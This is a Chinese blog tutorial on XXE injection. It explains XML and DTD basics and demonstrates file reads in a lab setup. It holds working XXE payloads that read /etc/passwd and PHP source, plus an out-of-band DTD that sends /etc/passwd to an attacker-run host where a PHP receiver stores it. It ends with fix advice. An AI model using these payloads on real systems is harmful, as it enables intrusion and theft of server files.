浅谈 XXE 漏洞任意文件读取

最新推荐文章于 2024-09-16 21:55:23 发布
最新推荐文章于 2024-09-16 21:55:23 发布
阅读量4.2k 收藏 14
点赞数 3
分类专栏: 漏洞原理 文章标签: xml 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fengzilin1973/article/details/116355031
版权

浅谈 XXE 漏洞任意文件读取

文章目录

0x00 前言

XXE Injection即 XML External Entity Injection,也就是XML外部实体注入攻击。通过XML实体,“SYSTEM” 关键词导致 XML 解析器可以从本地文件或远程 URL 中读取数据,所以攻击者可以通过 XML 实体传递自己构造的恶意值,是处理程序解析它。

危害如下:

  • 读取任意文件
  • DOS拒绝服务攻击
  • 代理扫描内网端口
  • 执行系统命令等

0x01 XML 基础知识

1.什么是XML

XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据,定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言,XML文档结构包括 XML 声明、DTD 文档类型定义(可选)、文档元素。

XML 设计宗旨是传输数据,而非显示数据,各种应用程序之间数据传输中最常用的工具。

2.XML 语法

2.1 语法规则
  • 所有元素都有一个闭合标签
  • 可以自定义标签和自己的文档结构
  • XML对大小写敏感
  • XML 正确嵌套
  • XML 属性值必须加 “”
  • XML中注释:<!-- 注释内容-->
  • XML中,5个预定义实体引用,如下:
实体实体符号含义
&lt;<小于
&gt;>大于
&amp;&和号
&apos;单引号
&quot;‘’引号
2.2 XML 结构
XML 文档声明,在文档的第一行
XML 文档类型定义,即DTD,XXE 漏洞所在的地方
XML 文档元素

image-20210427173413627

2.3 XML DTD(文档类型定义)

文档类型定义(DTD)可以是内部声明也可以引用外部 DTD

  • 内部声明 DTD 格式:<!DOCTYPE 根元素 [元素声明]>
  • 引用外部 DTD 格式:<!DOCTYPE 根元素 [元素声明]>

在DTD中进行实体声明时,将使用 ENTITY 关键字来声明。实体是用于定义引用普通稳定或特殊字符的快捷方式的变量。实体可在内部或外部进行声明

  • 内部声明实体格式:<!ENTITY 实体名称 "实体的值">
  • 引用外部实体格式:<!ENTITY 实体名称 SYSTEM "URL">

3.XML 注入时的两大要素

  • 标签闭合
  • 获取 XML 表结构

0x02 XXE 漏洞攻击

1.XXE 漏洞演示

XXE 漏洞攻击的测试地址: http://11.23.0.141/xxe.php

靶机:metasploitable2

xxe.php 代码

<?php 
$xml=file_get_contents("php://input"); 
$data = simplexml_load_string($xml) ; 
echo "<pre>" ; 
print_r($data) ;  
echo "</pre>" ; 
?>

打开burpsuite 截断

image-20210428104326525

payload 如下

<?xml version="1.0" encoding="utf-8"?>  

<!DOCTYPE xxe [ 
<!ELEMENT name ANY > 
<!ENTITY xxe SYSTEM "file:etc/passwd" >]> 
<root> 
<name>&xxe;</name> 
</root>

在上面的代码中, XML 外部实体(外部实体在 XML 中被引用) xxe 被赋予的值为:file:///etc/passwd。在解析 XML 文档的过程中,实体 ‘xxe’ 的值会被替换为URI(file://etc/passwd)内容值(也就是 passwd 文件的内容)。 关键字 ‘SYSTEM’ 会告诉 XML 解析器,‘xxe’ 实体的值将从其后的 URI 中读取,并把读取的内容替换 xxe 出现的地方。

将 GET 请求修改为 POST 请求,添加payload

image-20210428105520833

2.读取 PHP 文件

修改 payload 读取 xxe.php 文件,代码如下;

<?xml version="1.0" encoding="utf-8"?>  
<!DOCTYPE xxe [ 
<!ELEMENT name ANY > 
<!ENTITY xxe SYSTEM "file:///xxe.php" >]> 
<root> 
<name>&xxe;</name> 
</root>

没有读取到文件内容,原因是 php 文件需要进行加密才能够被读取

image-20210428112319257

修改 payload 代码如下:

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [ 
<!ELEMENT name ANY > 
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php" >]> 
<root> 
<name>&xxe;</name> 
</root>

image-20210428112429047

php 文件经过 base64 加密之后就可以正常读取了,在 Kali 中使用 base64 进行解密获取文本内容。

使用 burpsuite 解码 base64 结果为
image-20210428112554281

0x03 XXE 漏洞代码分析

xxe.php 源码

<?php 
$xml=file_get_contents("php://input"); 
$data = simplexml_load_string($xml) ; 
echo "<pre>" ; 
print_r($data) ;  
echo "</pre>" ; 
?>

代码解释

1.file_get_contents()

https://www.w3school.com.cn/php/func_filesystem_file_get_contents.asp

file_get_contents() 函数吧整个文件读入一个字符串中。获取客户端输入的内容

image-20210428094239046

php://input #是个可以访问请求的原始数据的只读流。

结合 file_get_contents(“php://input”) 可以读取POST提交的数据,存入 $xml

2.simplexml_load_string 函数介绍

php 中的 simplexml_load_string 函数将xml 格式字符串转换为对应的simpleXMLElementObject

3.XXE 注入的思路

  1. file_get_contents(“php://input”)可以读取 POST 提交的数据
  2. 那么我们通过 POST 提交 XML 代码,
  3. XML 代码中引用外部 DTD,读取黑客想要的系统文件
  4. 通过 simplexml_load_string()函数显示数据。

即通过 simplexml_load_string()函数将 XML 代码和引用的系统文件转换成 SimpleXMLElementObject 格式打印出来,此时加载的系统文件也会被打印出来。

0x04 无回显文件读取

1.实验环境介绍

将PentesterLab的 .iso 镜像直接导入即可

安装 PentesterLab 虚拟机

image-20210428113913759

查看IP 地址

192.168.159.133

image-20210428172032588

2.实验拓扑

image-20210428164617353

实验环境描述:Kali 作为黑客并建立黑客接受和提交数据的Web 站点,PentesterLab 作为 sever被攻击端

3.Kali 服务器准备工作

需要建立一个外部的 DTD 文件,一个用于接受数据的 PHP 文件,以及存储数据的数据文件。

3.1 建立 DTD 外部实体文件
┌──(root💀fengzilin55)-[~]
└─# cd /var/www/html 
                                                                                                         
┌──(root💀fengzilin55)-[/var/www/html]
└─# vim test.dtd

<!ENTITY % p1 SYSTEM "file:///etc/passwd"> 
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://192.168.159.132/xxe.php?pass=%p1;'>">%p2;

注:% p1 定义一个参数实体,%和 p1 之间有一个空格,用于接收 file:///etc/passwd 的内容,%p1 引用参数实体,参数实体只能在 DTD 文件中被引用。

3.2 建立 php 文件
┌──(root💀fengzilin55)-[/var/www/html]
└─# vim xxe.php 

<?php $pass=$_GET['pass']; file_put_contents('pass.txt',$pass); ?>
3.3 创建存储数据的文件
┌──(root💀fengzilin55)-[/var/www/html]
└─# touch pass.txt
3.4 修改文件权限
┌──(root💀fengzilin55)-[/var/www/html]
└─# chown -R www-data:www-data /var/www/html/*
3.5 启动 Apache2
┌──(root💀fengzilin55)-[/var/www/html]
└─# systemctl start apache2.service
3.6 测试 php 文件能够正常写入数据
┌──(root💀fengzilin55)-[/var/www/html]
└─# curl http://192.168.159.132/xxe.php?pass=1                                                                                                           ┌──(root💀fengzilin55)-[/var/www/html]
└─# cat pass.txt                              1

image-20210428183857629

4. 进行 XXE 攻击

Kali 中停止截断:

image-20210428184428376

访问 PentesterLab 地址:http://192.168.159.133

image-20210428184838844

开启 burpsuite 进行截断

image-20210428184921881

直接点击登录,不需要输入用户名密码

image-20210428185353529

使用 bp 将 get 请求改为 post 请求

image-20210428190853123

payload 代码

<?xml version="1.0"?> 
<!DOCTYPE e1 SYSTEM "http://192.168.1.53/test.dtd">
<foo>&e1;</foo>

抓到的包修改以下内容

改:Content-Type: application/x-www-form-urlencoded 
为:Content-Type: text/xml

image-20210428190740909

去 kali 主机上查看

┌──(root💀fengzilin55)-[/var/www/html]
└─# cat pass.txt

image-20210428190928685

0x05 XXE 漏洞修复建议

1.升级 libxml 版本

libxml 2.9.0以后,默认不解析外部实体,或者禁止使用外部实体.
http://www.linuxfromscratch.org/blfs/view/cvs/general/libxml2.html

image-20210428191153442

2.代码层防御

使用开发语言提供的禁用外部实体的方法

PHP:

libxml_disable_entity_loader(true);

JAVA:

DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance(); dbf.setExpandEntityReferences(false);

Python:

from lxml import etree xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

过滤用户提交的 XML 数据
关键词:<!DOCTYPE 和<!ENTITY,或者,SYSTEM 和 PUBLIC。

0x06 总结

本章节学习了,XXE 的漏洞,以及介绍了 XML 是什么,以及无回显文件怎么读取的详细步骤

参考文档

https://www.freebuf.com/vuls/263348.html

丰梓林
关注
专栏目录
33-3 XXE漏洞 - XXE外部实体注入(文件读取
weixin_43263566的博客
04-02 401
这个XML文档看起来很简单,但实际上它包含了一种XML外部实体注入(XXE)攻击。通过在DTD中定义恶意实体并在XML文档中引用它们,攻击者可以利用XXE漏洞读取敏感文件、执行命令或进行其他恶意操作。实体可以在XML文档中被引用,类似于变量,在文档解析过程中会被替换为其定义的值。:这是DOCTYPE声明,用于指定XML文档的文档类型定义(DTD)。,但实际上它可以被定义为任何攻击者想要的内容,包括文件路径、命令等。:这是XML文档的声明部分,指定了XML版本和字符编码。:在DTD中定义了一个实体。
浅浅浅浅谈XXE漏洞(附XXE攻击实例CVE-2017-12629)
SoulCat
03-06 3848
- `山有木兮木有枝,心悦君兮君不知`
windows文件读取 xxe_XXE漏洞利用方式详解
weixin_35029653的博客
12-11 678
XXE漏洞的详细原理解释和利用中,XXE的基本原理还有简单的文件读取利用方式我们已经有了基本的了解,那么接下来就带来我们的XXE漏洞详解——进阶篇!xxe漏洞利用在实战中往往会遇到很多的问题,也需要更多种多样的利用方式和技巧,本片就给大家一一介绍~读取文件时有特殊符号在读取文件时,文件中包含"<,>,&"等这些特殊符号时,会被xml解析器解析,报错从而导致读取失败,例如尝试读...
XXE文件随意读取
weixin_48421613的博客
09-03 1901
XXE的利用 声明: 我们本次实验所使用的php版本为5.4版本,有些版本是实验不成功的 XXE注入可分为有回显的与没有回显的 有回显的:制造一个具有xxe漏洞的代码(xxe.php) <?php $xml=simplexml_load_string($_GET['xml']); echo $xml; //这是有回显的xxe注入 ?> 首先我们使用我们本地的服务器进行探测,使用burpsuite进行抓板进行分析 我们可以看到我们提交的参数已经出
XXE读取任意文件 BUUCTF [PHP]XXE
最新发布
weixin_73049307的博客
09-16 514
ENTITY xxe SYSTEM "file:///etc/passwd" >]>改成"file:///phpinfo.php"也没显示出phpinfo.php文件内容,不知道怎么解决了。(注意:这里的POST的php文件名字必须是simplexml_load_string.php)直接Ctfl F搜索flag,发现还真有,尝试输入flag看看什么情况?发现是一段例子和介绍,将其复制到《XML基础知识之外部实体》一文中了。看到上面有个github的链接,点进去看看。很明显是个phpinfo.php文件
文件读取 xxe_XXE
weixin_36165398的博客
01-14 761
一、 XXE是什么?有哪些危害?XML外部实体,允许XML引用外部数据作为变量。形式如下。]><user><username>&xxe;username><password>adminpassword>user>由于外部实体允许多种协议,所以XXE等同于任意文件读取+SSRFXXE靶场https://github....
Web安全 XXE漏洞的 测试和利用.(读取服务器的任何文件 和 收集服务器的内网信息.)
网络安全领域___专研者.
03-08 6613
XXE漏洞全称(XML External Entity Injection),即XML外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成:文件读取、命令执行、内网端口扫描、攻击内网网站,DOS攻击 等危害.(xxe漏洞触发的点往往是可以上传xml文件的位置的,没有对上传的xml文件进行过滤,导致可上传恶意xml文件.)
XXE读取文件 Geek10th
weixin_44377940的博客
11-14 1019
点开网站: 抓包,修改属性: 返回了这么一串: 由于是$name==md5(),由弱类型比较和md5想到md5碰撞,
31-浅谈SSRF漏洞1
08-03
3. 利用脆弱组件和特殊协议(如ftp://, file:///, gopher://, dict://等)发起攻击,例如通过FFmpeg进行任意文件读取,或利用XXE漏洞。 检测SSRF攻击的方法通常涉及监控日志,寻找异常的内网IP请求,尤其是连续且...
浅谈—黑客最喜欢的攻击向量、技术或方法是什么?
C语言C++学习俱乐部:765860056
11-16 488
超过 38% 的黑客的答案是 XSS 漏洞,其次是 SQL 注入、模糊测试、业务逻辑、信息收集、SSRF、RCE、枚举、逆向工程、IDOR、暴力攻击、注入、CSRF、验证、XXE、DDoS。 常见网络攻击方式和说明 攻击方式说明 XSS 漏洞XSS 攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是 JavaScript,但实际上也可以包括 Java、 VBScript、ActiveX、 Fl.
浅谈ctf中phpinfo需要关注的点
weixin_44255856的博客
08-27 1490
首先我们先谈谈 php各个版本的的差异 php5.2以前 __autoload()加载类文件,但只能调用一次这个函数,所以可以用spl_autoload_register()加载类 关于 __autoload()函数,如果定义了该函数,该代码就会被调用 关于spl_autoload_register()函数:注册给定的函数作为 __autoload 的实现 当出现未定义的类时,标准PHP库会...
phpinfo查看可以解析的后缀_浅谈ctf中phpinfo需要关注的点
weixin_34646919的博客
01-28 522
首先我们先谈谈php各个版本的的差异php5.2以前__autoload()加载类文件,但只能调用一次这个函数,所以可以用spl_autoload_register()加载类关于 autoload()函数,如果定义了该函数,该代码就会被调用关于spl_autoload_register()函数:注册给定的函数作为autoload 的实现当出现未定义的类时,标准PHP库会按照注册的倒序逐个调用被注册...
文件读取 xxe_关于XML解析的外部实例引用漏洞攻击XXE
weixin_35914716的博客
01-15 493
XXE全称是——XML External Entity,也就是XML外部实体注入攻击。该漏洞的核心主要是在对不安全的外部实体数据进行处理时引发的安全攻击问题。如果攻击者可以上传XML文档、或HTTP通信过程中采用XML格式传输数据,并且能够在XML文档中添加恶意内容,他们就能够攻击含有缺陷的XML处理器。XXE漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行...
文件读取 xxe_漏洞笔记|记一次与XXE漏洞的爱恨纠缠
weixin_31641077的博客
01-15 429
0x01背景:kaiputenku大佬最近在挖洞的时候偶遇一枚XXE漏洞,身经百战的他经过一番爱恨纠缠,终将她顺利拿下~0x02纠缠一番只为她-Blind OOB XXE: 在测试某系统的某查询功能模块如下:查询模块.jpg(请各位大佬自行脑补)下面即将开始kaiputenku的表演:首先使用burp抓包,发现提交xml形式的数据包,很容易想到可能存在XML外部实体注入...
windows文件读取 xxe_Web应用常见漏洞浅析:XXE任意文件读写漏洞、远程代码执行……...
weixin_39551993的博客
12-22 675
原标题:Web应用常见漏洞浅析:XXE任意文件读写漏洞、远程代码执行…… 你的Web应用是否存在XXE漏洞? 如果你的应用是通过用户上传处理XML文件或POST请求(例如将SAML用于单点登录服务甚至是RSS)的,那么你很有可能会受到XXE的攻击。XXE是一种非常常见的漏洞类型,我们几乎每天都会碰到它。在去年的几次web应用渗透中,我们就成功的利用了好几回。什么是XXE“简单来说,XXE就是XML...
windows文件读取 xxe_XXE原理及利用
weixin_35387118的博客
12-21 1314
“一个人的伟大之处乃在于他是一座桥梁,而不是目的。By尼采”一XXE原理01XML 简介XML 指可扩展标记语言(EXtensible Markup Language),和HTML很类似,但XML的设计目的是传输数据而非显示数据,且XML没有预定义的标签,因此需要自行定义标签。下面是一个XML文档的实例。GeorgeJohnReminderDon't forget the meeting...
探索安全漏洞:230 OOB - 文件读取XXE工具
gitblog_00091的博客
06-09 342
探索安全漏洞:230 OOB - 文件读取XXE工具 去发现同类优质开源项目:https://gitcode.com/ 项目简介 在网络安全领域,了解和处理XML External Entity(XXE漏洞至关重要。230-OOB是一个由lc开发的Python脚本,它模拟了一个FTP服务器,使得开发者可以通过Out-of-Band方式利用XXE漏洞实现文件的远程读取。这个工具为安全研究人员和开...
利用XXE漏洞读取PHP文件内容攻击如何防范
06-08
针对利用XXE漏洞读取PHP文件内容的攻击,可以采取以下措施: 1. 避免使用外部实体。禁用或限制XML解析器的外部实体,以防止攻击者利用外部实体注入恶意代码。 2. 使用白名单机制。限制XML解析器只能访问预先定义的实体,禁止访问不受信任的实体。 3. 过滤输入。在接收到XML数据之前,对输入数据进行过滤,以删除或转义可能包含恶意代码的字符。 4. 更新XML解析器。使用最新版本的XML解析器,因为较新版本通常包含针对XXE攻击的修复程序。 5. 禁止远程文件访问。禁止XML解析器访问远程文件,以防止攻击者利用XXE漏洞读取PHP文件内容等敏感信息。 6. 隔离PHP文件。将PHP文件与其他文件隔离开来,以确保攻击者无法利用XXE漏洞读取PHP文件内容。 以上措施可以帮助防止利用XXE漏洞读取PHP文件内容的攻击,保护系统的安全。但是,最好的方法是使用安全的编程实践和审查代码,以防止XXE漏洞的出现。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值